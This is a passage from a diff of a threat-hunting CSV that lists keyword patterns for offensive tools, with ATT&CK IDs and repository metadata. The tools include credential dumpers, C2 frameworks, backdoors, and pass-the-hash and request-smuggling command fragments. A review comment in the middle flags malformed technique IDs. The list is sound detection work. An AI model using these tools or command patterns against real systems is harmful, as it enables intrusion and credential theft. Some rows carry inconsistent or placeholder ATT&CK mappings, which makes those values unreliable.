T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" 
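Review bot: The `+` row for `*gophish.go*` writes its sub-techniques with a hyphen (`T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001`), while the other rows in this hunk use the dotted ATT&CK form (`T1003.002`, `T1110.003`). Anything that joins this column to ATT&CK will fail to resolve those IDs, so the value should read `T1566.001 - T1566.002 - T1566.003 - T1056.001 - T1113 - T1567.001`. The three gophish rows also disagree with each other for the same tool: category `C2` with `TA0002 - TA0003` on one, `Exploitation tools` with `TA0008 - TA0009` on the other two. None of them lists Initial Access (`TA0001`), the tactic T1566 belongs to; aligning the three rows would keep triage context consistent whichever keyword fires.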
@@ -11032,19 +11183,19 @@ "*govolution/avet*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" "*goZulipC2.go*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z" "*goZulipC2-main*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z" -"*gpg2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*gpoddity.py*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"*gpoddity_smbserver.py*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation 
tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"*GPOddity-master*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"*GPO-RemoteAccess.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*gpp_autologin.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*gpp_password.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*GPP_Passwords.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*gpg2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 
T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*gpoddity.py*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*gpoddity_smbserver.py*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*GPOddity-master*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*GPO-RemoteAccess.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*gpp_autologin.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*gpp_password.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST 
Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*GPP_Passwords.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*gppassword.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*gpp-decrypt *","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*gpp-decrypt.py -f groups.xml*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*gpp-decrypt.rb*","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","1","N/A","6","10","N/A","N/A","N/A","N/A" -"*GPSCoordinates.exe*","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - 
T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*GPSCoordinates.exe*","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*Gr1mmie/AtlasC2*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*GrantMailboxAccess.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" "*GrantSamAccessPermission.vbs*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" 
@@ -11057,65 +11208,65 @@ "*Group3r.cs*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","1","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z" "*Group3r.exe*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","1","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z" "*Group3r/Group3r*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","1","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z" -"*GruntInjection.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*gruntstager.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*GruntStager.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - 
T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*GruntInjection.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*gruntstager.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*GruntStager.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*gtfobins*","offensive_tool_keyword","gtfobins","GTFOBins is a curated list of Unix binaries that can used to bypass local security restrictions in misconfigured systems malicious use of legitimate binaries","T1059 - T1068 - T1043 - T1136","TA0002 - TA0005","N/A","N/A","POST Exploitation tools","https://gtfobins.github.io/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
"*GTFOBLookup*","offensive_tool_keyword","GTFOBLookup","Offline command line lookup utility for GTFOBins and LOLBAS.","T1059 - T1110 - T1216 - T1220","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/nccgroup/GTFOBLookup","1","1","N/A","N/A","3","215","40","2023-06-16T22:01:43Z","2019-09-23T16:00:18Z" -"*gtworek/Priv2Admin*","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1572","243","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" +"*gtworek/Priv2Admin*","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1573","243","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" "*guardicore*monkey*","offensive_tool_keyword","Github Username","Welcome to the Infection Monkey! The Infection Monkey is an open source security tool for testing a data centers resiliency to perimeter breaches and internal server infection. 
The Monkey uses various methods to self propagate across a data center and reports success to a centralized Monkey Island server","T1566 - T1569 - T1570 - T1571 - T1572 - T1573","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/h0nus","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*guardicore/monkey*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*guida.exe -*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","387","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" -"*gunicorn ares:app*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","523","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" -"*Gupt-Backdoor.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*guardicore/monkey*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*guida.exe -*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","388","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" +"*gunicorn ares:app*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*Gupt-Backdoor.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg==*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" -"*-H lm-hash:nt-hash*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*-H 'LMHASH:NTHASH'*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*-H 'NTHASH'*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*-H lm-hash:nt-hash*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*-H 'LMHASH:NTHASH'*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*-H 'NTHASH'*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*h2csmuggler --scan-list *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*h2csmuggler -x * --test*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*h8mail -*","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","0","N/A","N/A","1","9","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" "*h8mail -t *@*.*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*h8mail*","offensive_tool_keyword","h8mail","h8mail is an email OSINT and breach hunting tool using different breach and reconnaissance services. or local breaches such as Troy Hunts Collection1 and the infamous Breach Compilation torrent","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/khast3x/h8mail","1","0","N/A","N/A","10","3553","480","2023-08-15T10:50:34Z","2018-06-15T02:47:00Z" -"*Ha3MrX/Gemail-Hack*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","7","9","813","385","2022-02-18T16:12:45Z","2018-04-19T13:48:41Z" +"*h8mail*","offensive_tool_keyword","h8mail","h8mail is an email OSINT and breach hunting tool using different breach and reconnaissance services. 
or local breaches such as Troy Hunts Collection1 and the infamous Breach Compilation torrent","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/khast3x/h8mail","1","0","N/A","N/A","10","3554","480","2023-08-15T10:50:34Z","2018-06-15T02:47:00Z" +"*Ha3MrX/Gemail-Hack*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","7","9","815","385","2022-02-18T16:12:45Z","2018-04-19T13:48:41Z" "*haad/proxychains*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","1","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" "*hackbrowersdata.cna*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 
